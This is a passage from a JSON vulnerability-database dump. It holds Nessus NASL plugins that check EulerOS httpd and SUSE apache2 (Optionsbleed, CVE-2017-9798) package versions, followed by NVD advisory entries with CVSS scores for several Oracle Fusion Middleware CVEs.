get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"httpd-2.4.6-45.0.1.4.h8\",\n \"httpd-devel-2.4.6-45.0.1.4.h8\",\n \"httpd-manual-2.4.6-45.0.1.4.h8\",\n \"httpd-tools-2.4.6-45.0.1.4.h8\",\n \"mod_ssl-2.4.6-45.0.1.4.h8\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:23:41", "description": "This update for apache2 fixes one issues. This security issue was fixed :\n\n - CVE-2017-9798: Prevent use-after-free use of memory that allowed for an information leak via OPTIONS (bsc#1058058)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-10-13T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : apache2 (SUSE-SU-2017:2718-1) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:apache2", "p-cpe:/a:novell:suse_linux:apache2-debuginfo", "p-cpe:/a:novell:suse_linux:apache2-debugsource", "p-cpe:/a:novell:suse_linux:apache2-example-pages", "p-cpe:/a:novell:suse_linux:apache2-prefork", "p-cpe:/a:novell:suse_linux:apache2-prefork-debuginfo", "p-cpe:/a:novell:suse_linux:apache2-utils", "p-cpe:/a:novell:suse_linux:apache2-utils-debuginfo", "p-cpe:/a:novell:suse_linux:apache2-worker", "p-cpe:/a:novell:suse_linux:apache2-worker-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-2718-1.NASL", "href": "https://www.tenable.com/plugins/nessus/103833", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2718-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103833);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-9798\");\n\n script_name(english:\"SUSE SLES12 Security Update : apache2 (SUSE-SU-2017:2718-1) (Optionsbleed)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for apache2 fixes one issues. This security issue was\nfixed :\n\n - CVE-2017-9798: Prevent use-after-free use of memory that\n allowed for an information leak via OPTIONS\n (bsc#1058058)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058058\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-9798/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172718-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b3bb4ad6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 6:zypper in -t patch\nSUSE-OpenStack-Cloud-6-2017-1682=1\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2017-1682=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-1682=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-debuginfo-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-debugsource-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-example-pages-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-prefork-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-prefork-debuginfo-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-utils-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-utils-debuginfo-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-worker-2.4.16-20.13.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"apache2-worker-debuginfo-2.4.16-20.13.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2023-06-07T14:40:03", "description": "Vulnerability in the Oracle Access Manager component of Oracle Fusion Middleware (subcomponent: Web Server Plugin). The supported version that is affected is 11.1.2.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Access Manager. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Access Manager accessible data. CVSS 3.0 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2017-10262", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10262"], "modified": "2018-01-25T13:52:00", "cpe": ["cpe:/a:oracle:access_manager:11.1.2.3.0"], "id": "CVE-2017-10262", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10262", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:access_manager:11.1.2.3.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:40:07", "description": "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Deployment). Supported versions that are affected are 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.2.0. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle JDeveloper executes to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data as well as unauthorized read access to a subset of Oracle JDeveloper accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle JDeveloper. CVSS 3.0 Base Score 4.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L).", "cvss3": {"exploitabilityScore": 0.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.7}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2017-10273", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.7, "vectorString": "AV:L/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10273"], "modified": "2018-01-25T13:52:00", "cpe": ["cpe:/a:oracle:jdeveloper:11.1.1.7.0", "cpe:/a:oracle:jdeveloper:11.1.2.4.0", "cpe:/a:oracle:jdeveloper:12.1.3.0.0", "cpe:/a:oracle:jdeveloper:11.1.1.9.0", "cpe:/a:oracle:jdeveloper:11.1.1.7.1", "cpe:/a:oracle:jdeveloper:12.2.1.2.0"], "id": "CVE-2017-10273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10273", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:11.1.2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:12.2.1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:11.1.1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:11.1.1.7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:40:29", "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services). The supported version that is affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. While the vulnerability is in Oracle WebLogic Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle WebLogic Server as well as unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data and unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 9.9 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 9.9, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.3}, "published": "2017-10-19T17:29:00", "type": "cve", "title": "CVE-2017-10352", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10352"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:weblogic_server:12.2.1.1.0", "cpe:/a:oracle:weblogic_server:12.2.1.2.0", "cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.3.0", "cpe:/a:oracle:weblogic_server:12.1.3.0.0"], "id": "CVE-2017-10352", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10352", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:39:02", "description": "Vulnerability in the Oracle Business Intelligence Enterprise Edition component of Oracle Fusion Middleware (subcomponent: Analytics Web Dashboards). The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 4.7}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2017-10068", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10068"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:business_intelligence:12.2.1.3.0"], "id": "CVE-2017-10068", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10068", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:oracle:business_intelligence:12.2.1.3.0:*:*:*:enterprise:*:*:*"]}, {"lastseen": "2023-06-07T14:51:22", "description": "Vulnerability in the Hyperion BI+ component of Oracle Hyperion (subcomponent: Foundation UI & Servlets). The supported version that is affected is 11.1.2.4. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Hyperion BI+. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Hyperion BI+ accessible data as well as unauthorized read access to a subset of Hyperion BI+ accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Hyperion BI+. CVSS 3.0 Base Score 4.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L).", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "baseScore": 4.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.4}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2018-2594", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2594"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:hyperion_bi\\+:11.1.2.4"], "id": "CVE-2018-2594", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2594", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:hyperion_bi\\+:11.1.2.4:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:51:15", "description": "Vulnerability in the Oracle WebCenter Content component of Oracle Fusion Middleware (subcomponent: Content Server). The supported version that is affected is 11.1.1.9.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebCenter Content. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Content, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebCenter Content accessible data as well as unauthorized read access to a subset of Oracle WebCenter Content accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 4.7}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2018-2564", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2564"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:webcenter_content:11.1.1.9.0"], "id": "CVE-2018-2564", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2564", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:oracle:webcenter_content:11.1.1.9.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:51:57", "description": "Vulnerability in the Oracle Business Intelligence Enterprise Edition component of Oracle Fusion Middleware (subcomponent: BI Platform Security). Supported versions that are affected are 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.0 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2018-2715", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2715"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:oracle:business_intelligence:12.2.1.2.0", "cpe:/a:oracle:business_intelligence:12.2.1.3.0"], "id": "CVE-2018-2715", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2715", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:business_intelligence:12.2.1.3.0:*:*:*:enterprise:*:*:*", "cpe:2.3:a:oracle:business_intelligence:12.2.1.2.0:*:*:*:enterprise:*:*:*"]}, {"lastseen": "2023-06-07T14:51:12", "description": "Vulnerability in the Oracle HTTP Server component of Oracle Fusion Middleware (subcomponent: Web Listener). Supported versions that are affected are 11.1.1.7.0, 11.1.1.9.0, 12.1.3.0.0, 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle HTTP Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle HTTP Server. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": 